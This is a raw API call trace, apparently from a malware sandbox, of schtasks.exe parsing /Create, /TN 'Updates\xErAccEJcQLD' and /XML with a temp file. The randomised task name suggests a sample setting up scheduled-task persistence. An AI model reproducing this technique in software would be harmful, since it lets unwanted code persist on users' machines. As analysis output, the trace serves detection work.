[0193.549] lstrlenW (lpString="?") returned 1
[0193.549] GetProcessHeap () returned 0x4770000
[0193.549] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x10) returned 0x4777348
[0193.549] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.549] GetProcessHeap () returned 0x4770000
[0193.549] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0xa) returned 0x47774b0
[0193.549] lstrlenW (lpString="Create") returned 6
[0193.549] GetProcessHeap () returned 0x4770000
[0193.549] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x10) returned 0x47773a8
[0193.549] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.549] GetProcessHeap () returned 0x4770000
[0193.550] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x47795e8
[0193.550] _vsnwprintf (in: _Buffer=0x47774b0, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|?|") returned 3
[0193.550] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|Create|") returned 8
[0193.550] lstrlenW (lpString="|?|") returned 3
[0193.550] lstrlenW (lpString="|Create|") returned 8
[0193.550] RtlRestoreLastWin32Error () returned 0x490
[0193.550] lstrlenW (lpString="create") returned 6
[0193.550] lstrlenW (lpString="create") returned 6
[0193.550] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.550] GetProcessHeap () returned 0x4770000
[0193.550] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x47774b0) returned 1
[0193.550] GetProcessHeap () returned 0x4770000
[0193.550] RtlReAllocateHeap (Heap=0x4770000, Flags=0xc, Ptr=0x47774b0, Size=0x14) returned 0x4779368
[0193.550] lstrlenW (lpString="Create") returned 6
[0193.550] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.550] _vsnwprintf (in: _Buffer=0x4779368, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|create|") returned 8
[0193.550] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|Create|") returned 8
[0193.550] lstrlenW (lpString="|create|") returned 8
[0193.550] lstrlenW (lpString="|Create|") returned 8
[0193.550] StrStrIW (lpFirst="|create|", lpSrch="|Create|") returned="|create|"
[0193.550] RtlRestoreLastWin32Error () returned 0x0
[0193.550] RtlRestoreLastWin32Error () returned 0x0
[0193.550] RtlRestoreLastWin32Error () returned 0x0
[0193.550] lstrlenW (lpString="/TN") returned 3
[0193.550] lstrlenW (lpString="-/") returned 2
[0193.550] StrChrIW (lpStart="-/", wMatch=0x4a3002f) returned="/"
[0193.550] lstrlenW (lpString="?") returned 1
[0193.550] lstrlenW (lpString="?") returned 1
[0193.551] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.551] lstrlenW (lpString="TN") returned 2
[0193.551] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.551] _vsnwprintf (in: _Buffer=0x4779368, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|?|") returned 3
[0193.551] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|TN|") returned 4
[0193.551] lstrlenW (lpString="|?|") returned 3
[0193.551] lstrlenW (lpString="|TN|") returned 4
[0193.551] RtlRestoreLastWin32Error () returned 0x490
[0193.551] lstrlenW (lpString="create") returned 6
[0193.551] lstrlenW (lpString="create") returned 6
[0193.551] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.551] lstrlenW (lpString="TN") returned 2
[0193.551] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.551] _vsnwprintf (in: _Buffer=0x4779368, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|create|") returned 8
[0193.551] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|TN|") returned 4
[0193.551] lstrlenW (lpString="|create|") returned 8
[0193.551] lstrlenW (lpString="|TN|") returned 4
[0193.551] StrStrIW (lpFirst="|create|", lpSrch="|TN|") returned 0x0
[0193.551] RtlRestoreLastWin32Error () returned 0x490
[0193.551] lstrlenW (lpString="delete") returned 6
[0193.551] lstrlenW (lpString="delete") returned 6
[0193.551] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.551] lstrlenW (lpString="TN") returned 2
[0193.551] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.551] _vsnwprintf (in: _Buffer=0x4779368, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|delete|") returned 8
[0193.551] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|TN|") returned 4
[0193.551] lstrlenW (lpString="|delete|") returned 8
[0193.551] lstrlenW (lpString="|TN|") returned 4
[0193.551] StrStrIW (lpFirst="|delete|", lpSrch="|TN|") returned 0x0
[0193.552] RtlRestoreLastWin32Error () returned 0x490
[0193.552] lstrlenW (lpString="query") returned 5
[0193.552] lstrlenW (lpString="query") returned 5
[0193.552] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.552] lstrlenW (lpString="TN") returned 2
[0193.552] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.552] _vsnwprintf (in: _Buffer=0x4779368, _BufferCount=0x8, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|query|") returned 7
[0193.552] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|TN|") returned 4
[0193.552] lstrlenW (lpString="|query|") returned 7
[0193.552] lstrlenW (lpString="|TN|") returned 4
[0193.552] StrStrIW (lpFirst="|query|", lpSrch="|TN|") returned 0x0
[0193.552] RtlRestoreLastWin32Error () returned 0x490
[0193.552] lstrlenW (lpString="change") returned 6
[0193.552] lstrlenW (lpString="change") returned 6
[0193.552] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.552] lstrlenW (lpString="TN") returned 2
[0193.552] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.552] _vsnwprintf (in: _Buffer=0x4779368, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|change|") returned 8
[0193.552] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|TN|") returned 4
[0193.552] lstrlenW (lpString="|change|") returned 8
[0193.552] lstrlenW (lpString="|TN|") returned 4
[0193.552] StrStrIW (lpFirst="|change|", lpSrch="|TN|") returned 0x0
[0193.552] RtlRestoreLastWin32Error () returned 0x490
[0193.552] lstrlenW (lpString="run") returned 3
[0193.552] lstrlenW (lpString="run") returned 3
[0193.552] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.552] lstrlenW (lpString="TN") returned 2
[0193.553] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.553] _vsnwprintf (in: _Buffer=0x4779368, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|run|") returned 5
[0193.553] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|TN|") returned 4
[0193.553] lstrlenW (lpString="|run|") returned 5
[0193.553] lstrlenW (lpString="|TN|") returned 4
[0193.553] StrStrIW (lpFirst="|run|", lpSrch="|TN|") returned 0x0
[0193.553] RtlRestoreLastWin32Error () returned 0x490
[0193.553] lstrlenW (lpString="end") returned 3
[0193.553] lstrlenW (lpString="end") returned 3
[0193.553] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.553] lstrlenW (lpString="TN") returned 2
[0193.553] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.553] _vsnwprintf (in: _Buffer=0x4779368, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|end|") returned 5
[0193.553] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|TN|") returned 4
[0193.553] lstrlenW (lpString="|end|") returned 5
[0193.553] lstrlenW (lpString="|TN|") returned 4
[0193.553] StrStrIW (lpFirst="|end|", lpSrch="|TN|") returned 0x0
[0193.553] RtlRestoreLastWin32Error () returned 0x490
[0193.553] lstrlenW (lpString="showsid") returned 7
[0193.553] lstrlenW (lpString="showsid") returned 7
[0193.553] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.553] GetProcessHeap () returned 0x4770000
[0193.553] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4779368) returned 1
[0193.554] GetProcessHeap () returned 0x4770000
[0193.554] RtlReAllocateHeap (Heap=0x4770000, Flags=0xc, Ptr=0x4779368, Size=0x16) returned 0x4779448
[0193.554] lstrlenW (lpString="TN") returned 2
[0193.554] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.554] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0xa, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|showsid|") returned 9
[0193.554] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|TN|") returned 4
[0193.554] lstrlenW (lpString="|showsid|") returned 9
[0193.554] lstrlenW (lpString="|TN|") returned 4
[0193.554] StrStrIW (lpFirst="|showsid|", lpSrch="|TN|") returned 0x0
[0193.554] RtlRestoreLastWin32Error () returned 0x490
[0193.554] RtlRestoreLastWin32Error () returned 0x490
[0193.554] RtlRestoreLastWin32Error () returned 0x0
[0193.554] lstrlenW (lpString="/TN") returned 3
[0193.554] StrChrIW (lpStart="/TN", wMatch=0x3a) returned 0x0
[0193.554] RtlRestoreLastWin32Error () returned 0x490
[0193.554] RtlRestoreLastWin32Error () returned 0x0
[0193.554] lstrlenW (lpString="/TN") returned 3
[0193.554] GetProcessHeap () returned 0x4770000
[0193.554] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x8) returned 0x4776c70
[0193.554] GetProcessHeap () returned 0x4770000
[0193.554] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x4779488
[0193.554] RtlRestoreLastWin32Error () returned 0x0
[0193.554] RtlRestoreLastWin32Error () returned 0x0
[0193.554] lstrlenW (lpString="Updates\\xErAccEJcQLD") returned 20
[0193.554] lstrlenW (lpString="-/") returned 2
[0193.554] StrChrIW (lpStart="-/", wMatch=0x4a30055) returned 0x0
[0193.555] RtlRestoreLastWin32Error () returned 0x490
[0193.555] RtlRestoreLastWin32Error () returned 0x490
[0193.555] RtlRestoreLastWin32Error () returned 0x0
[0193.555] lstrlenW (lpString="Updates\\xErAccEJcQLD") returned 20
[0193.555] StrChrIW (lpStart="Updates\\xErAccEJcQLD", wMatch=0x3a) returned 0x0
[0193.555] RtlRestoreLastWin32Error () returned 0x490
[0193.555] RtlRestoreLastWin32Error () returned 0x0
[0193.555] lstrlenW (lpString="Updates\\xErAccEJcQLD") returned 20
[0193.555] GetProcessHeap () returned 0x4770000
[0193.555] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x2a) returned 0x47770d0
[0193.555] GetProcessHeap () returned 0x4770000
[0193.555] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x4779328
[0193.555] RtlRestoreLastWin32Error () returned 0x0
[0193.555] RtlRestoreLastWin32Error () returned 0x0
[0193.555] lstrlenW (lpString="/XML") returned 4
[0193.555] lstrlenW (lpString="-/") returned 2
[0193.555] StrChrIW (lpStart="-/", wMatch=0x4a3002f) returned="/"
[0193.555] lstrlenW (lpString="?") returned 1
[0193.555] lstrlenW (lpString="?") returned 1
[0193.555] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.555] lstrlenW (lpString="XML") returned 3
[0193.555] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.555] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|?|") returned 3
[0193.555] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|XML|") returned 5
[0193.555] lstrlenW (lpString="|?|") returned 3
[0193.555] lstrlenW (lpString="|XML|") returned 5
[0193.555] RtlRestoreLastWin32Error () returned 0x490
[0193.555] lstrlenW (lpString="create") returned 6
[0193.555] lstrlenW (lpString="create") returned 6
[0193.555] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.555] lstrlenW (lpString="XML") returned 3
[0193.556] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.556] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|create|") returned 8
[0193.556] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|XML|") returned 5
[0193.556] lstrlenW (lpString="|create|") returned 8
[0193.556] lstrlenW (lpString="|XML|") returned 5
[0193.556] StrStrIW (lpFirst="|create|", lpSrch="|XML|") returned 0x0
[0193.556] RtlRestoreLastWin32Error () returned 0x490
[0193.556] lstrlenW (lpString="delete") returned 6
[0193.556] lstrlenW (lpString="delete") returned 6
[0193.556] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.556] lstrlenW (lpString="XML") returned 3
[0193.556] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.556] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|delete|") returned 8
[0193.556] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|XML|") returned 5
[0193.556] lstrlenW (lpString="|delete|") returned 8
[0193.556] lstrlenW (lpString="|XML|") returned 5
[0193.556] StrStrIW (lpFirst="|delete|", lpSrch="|XML|") returned 0x0
[0193.556] RtlRestoreLastWin32Error () returned 0x490
[0193.556] lstrlenW (lpString="query") returned 5
[0193.556] lstrlenW (lpString="query") returned 5
[0193.556] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.556] lstrlenW (lpString="XML") returned 3
[0193.556] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.556] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x8, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|query|") returned 7
[0193.556] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|XML|") returned 5
[0193.557] lstrlenW (lpString="|query|") returned 7
[0193.557] lstrlenW (lpString="|XML|") returned 5
[0193.557] StrStrIW (lpFirst="|query|", lpSrch="|XML|") returned 0x0
[0193.557] RtlRestoreLastWin32Error () returned 0x490
[0193.557] lstrlenW (lpString="change") returned 6
[0193.557] lstrlenW (lpString="change") returned 6
[0193.557] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.557] lstrlenW (lpString="XML") returned 3
[0193.557] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.557] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|change|") returned 8
[0193.557] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|XML|") returned 5
[0193.557] lstrlenW (lpString="|change|") returned 8
[0193.557] lstrlenW (lpString="|XML|") returned 5
[0193.557] StrStrIW (lpFirst="|change|", lpSrch="|XML|") returned 0x0
[0193.557] RtlRestoreLastWin32Error () returned 0x490
[0193.557] lstrlenW (lpString="run") returned 3
[0193.557] lstrlenW (lpString="run") returned 3
[0193.557] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.557] lstrlenW (lpString="XML") returned 3
[0193.557] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.557] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|run|") returned 5
[0193.557] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|XML|") returned 5
[0193.557] lstrlenW (lpString="|run|") returned 5
[0193.557] lstrlenW (lpString="|XML|") returned 5
[0193.558] StrStrIW (lpFirst="|run|", lpSrch="|XML|") returned 0x0
[0193.558] RtlRestoreLastWin32Error () returned 0x490
[0193.558] lstrlenW (lpString="end") returned 3
[0193.558] lstrlenW (lpString="end") returned 3
[0193.558] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.558] lstrlenW (lpString="XML") returned 3
[0193.558] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.558] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|end|") returned 5
[0193.558] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|XML|") returned 5
[0193.558] lstrlenW (lpString="|end|") returned 5
[0193.558] lstrlenW (lpString="|XML|") returned 5
[0193.558] StrStrIW (lpFirst="|end|", lpSrch="|XML|") returned 0x0
[0193.558] RtlRestoreLastWin32Error () returned 0x490
[0193.558] lstrlenW (lpString="showsid") returned 7
[0193.558] lstrlenW (lpString="showsid") returned 7
[0193.558] _memicmp (_Buf1=0x4777348, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.558] lstrlenW (lpString="XML") returned 3
[0193.558] _memicmp (_Buf1=0x47773a8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.558] _vsnwprintf (in: _Buffer=0x4779448, _BufferCount=0xa, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|showsid|") returned 9
[0193.558] _vsnwprintf (in: _Buffer=0x47795e8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdfae0 | out: _Buffer="|XML|") returned 5
[0193.558] lstrlenW (lpString="|showsid|") returned 9
[0193.558] lstrlenW (lpString="|XML|") returned 5
[0193.558] StrStrIW (lpFirst="|showsid|", lpSrch="|XML|") returned 0x0
[0193.558] RtlRestoreLastWin32Error () returned 0x490
[0193.558] RtlRestoreLastWin32Error () returned 0x490
[0193.558] RtlRestoreLastWin32Error () returned 0x0
[0193.558] lstrlenW (lpString="/XML") returned 4
[0193.558] StrChrIW (lpStart="/XML", wMatch=0x3a) returned 0x0
[0193.558] RtlRestoreLastWin32Error () returned 0x490
[0193.558] RtlRestoreLastWin32Error () returned 0x0
[0193.559] lstrlenW (lpString="/XML") returned 4
[0193.559] GetProcessHeap () returned 0x4770000
[0193.559] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0xa) returned 0x47773f0
[0193.559] GetProcessHeap () returned 0x4770000
[0193.559] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x47796c8
[0193.559] RtlRestoreLastWin32Error () returned 0x0
[0193.559] RtlRestoreLastWin32Error () returned 0x0
[0193.559] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp2010.tmp") returned 52
[0193.559] lstrlenW (lpString="-/") returned 2
[0193.559] StrChrIW (lpStart="-/", wMatch=0x4a30043) returned 0x0
[0193.559] RtlRestoreLastWin32Error () returned 0x490
[0193.559] RtlRestoreLastWin32Error () returned 0x490
[0193.559] RtlRestoreLastWin32Error () returned 0x0
[0193.559] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp2010.tmp") returned 52
[0193.559] StrChrIW (lpStart="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp2010.tmp", wMatch=0x3a) returned=":\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp2010.tmp"
[0193.559] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp2010.tmp") returned 52
[0193.559] GetProcessHeap () returned 0x4770000
[0193.559] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x10) returned 0x47774b0
[0193.559] _memicmp (_Buf1=0x47774b0, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.559] GetProcessHeap () returned 0x4770000
[0193.559] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0xc) returned 0x4777408
[0193.559] GetProcessHeap () returned 0x4770000
[0193.559] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x10) returned 0x477aaa8
[0193.559] _memicmp (_Buf1=0x477aaa8, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.559] GetProcessHeap () returned 0x4770000
[0193.559] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x6e) returned 0x477ada8
[0193.559] RtlRestoreLastWin32Error () returned 0x7a
[0193.559] RtlRestoreLastWin32Error () returned 0x0
[0193.559] RtlRestoreLastWin32Error () returned 0x0
[0193.559] lstrlenW (lpString="C") returned 1
[0193.559] RtlRestoreLastWin32Error () returned 0x490
[0193.559] RtlRestoreLastWin32Error () returned 0x0
[0193.559] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp2010.tmp") returned 52
[0193.559] GetProcessHeap () returned 0x4770000
[0193.559] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x6a) returned 0x477ae20
[0193.560] GetProcessHeap () returned 0x4770000
[0193.560] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x47794a8
[0193.560] RtlRestoreLastWin32Error () returned 0x0
[0193.560] GetProcessHeap () returned 0x4770000
[0193.560] GetProcessHeap () returned 0x4770000
[0193.560] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4776c70) returned 1
[0193.560] GetProcessHeap () returned 0x4770000
[0193.560] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4776c70) returned 0x8
[0193.560] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4776c70) returned 1
[0193.560] GetProcessHeap () returned 0x4770000
[0193.560] GetProcessHeap () returned 0x4770000
[0193.560] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4779488) returned 1
[0193.560] GetProcessHeap () returned 0x4770000
[0193.560] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4779488) returned 0x14
[0193.560] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4779488) returned 1
[0193.560] GetProcessHeap () returned 0x4770000
[0193.560] GetProcessHeap () returned 0x4770000
[0193.560] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x47770d0) returned 1
[0193.560] GetProcessHeap () returned 0x4770000
[0193.560] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x47770d0) returned 0x2a
[0193.560] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x47770d0) returned 1
[0193.560] GetProcessHeap () returned 0x4770000
[0193.560] GetProcessHeap () returned 0x4770000
[0193.560] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4779328) returned 1
[0193.560] GetProcessHeap () returned 0x4770000
[0193.560] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4779328) returned 0x14
[0193.560] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4779328) returned 1
[0193.560] GetProcessHeap () returned 0x4770000
[0193.560] GetProcessHeap () returned 0x4770000
[0193.560] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x47773f0) returned 1
[0193.560] GetProcessHeap () returned 0x4770000
[0193.560] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x47773f0) returned 0xa
[0193.560] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x47773f0) returned 1
[0193.560] GetProcessHeap () returned 0x4770000
[0193.560] GetProcessHeap () returned 0x4770000
[0193.560] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x47796c8) returned 1
[0193.561] GetProcessHeap () returned 0x4770000
[0193.561] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x47796c8) returned 0x14
[0193.561] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x47796c8) returned 1
[0193.561] GetProcessHeap () returned 0x4770000
[0193.561] GetProcessHeap () returned 0x4770000
[0193.561] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x477ae20) returned 1
[0193.561] GetProcessHeap () returned 0x4770000
[0193.561] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x477ae20) returned 0x6a
[0193.561] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x477ae20) returned 1
[0193.561] GetProcessHeap () returned 0x4770000
[0193.561] GetProcessHeap () returned 0x4770000
[0193.561] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x47794a8) returned 1
[0193.561] GetProcessHeap () returned 0x4770000
[0193.561] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x47794a8) returned 0x14
[0193.561] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x47794a8) returned 1
[0193.561] GetProcessHeap () returned 0x4770000
[0193.561] GetProcessHeap () returned 0x4770000
[0193.561] HeapValidate (hHeap=0x4770000, dwFlags=0x0, lpMem=0x4777498) returned 1
[0193.561] GetProcessHeap () returned 0x4770000
[0193.561] RtlSizeHeap (HeapHandle=0x4770000, Flags=0x0, MemoryPointer=0x4777498) returned 0x10
[0193.561] RtlFreeHeap (HeapHandle=0x4770000, Flags=0x0, BaseAddress=0x4777498) returned 1
[0193.562] RtlRestoreLastWin32Error () returned 0x0
[0193.562] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18
[0193.562] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b
[0193.562] VerSetConditionMask (ConditionMask=0x1b, TypeMask=0x80000000, Condition=0x20) returned 0x1801b
[0193.562] RtlVerifyVersionInfo (VersionInfo=0xdce60, TypeMask=0x3, ConditionMask=0x1801b) returned 0x0
[0193.562] RtlRestoreLastWin32Error () returned 0x0
[0193.562] lstrlenW (lpString="create") returned 6
[0193.562] StrChrIW (lpStart="create", wMatch=0x7c) returned 0x0
[0193.562] RtlRestoreLastWin32Error () returned 0x490
[0193.562] RtlRestoreLastWin32Error () returned 0x0
[0193.562] lstrlenW (lpString="create") returned 6
[0193.562] GetProcessHeap () returned 0x4770000
[0193.562] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x14) returned 0x4779488
[0193.562] GetProcessHeap () returned 0x4770000
[0193.562] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x10) returned 0x477ab20
[0193.562] _memicmp (_Buf1=0x477ab20, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.562] GetProcessHeap () returned 0x4770000
[0193.562] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x16) returned 0x4779628
[0193.562] RtlRestoreLastWin32Error () returned 0x0
[0193.562] _memicmp (_Buf1=0x4777438, _Buf2=0x3a2708, _Size=0x7) returned 0
[0193.562] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4778ce0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\schtasks.exe" (normalized: "c:\\windows\\syswow64\\schtasks.exe")) returned 0x20
[0193.562] GetFileVersionInfoSizeExW (in: dwFlags=0x1, lpwstrFilename="C:\\Windows\\SysWOW64\\schtasks.exe", lpdwHandle=0xdcf6c | out: lpdwHandle=0xdcf6c) returned 0x76c
[0193.563] GetProcessHeap () returned 0x4770000
[0193.563] RtlAllocateHeap (HeapHandle=0x4770000, Flags=0xc, Size=0x776) returned 0x4779db8
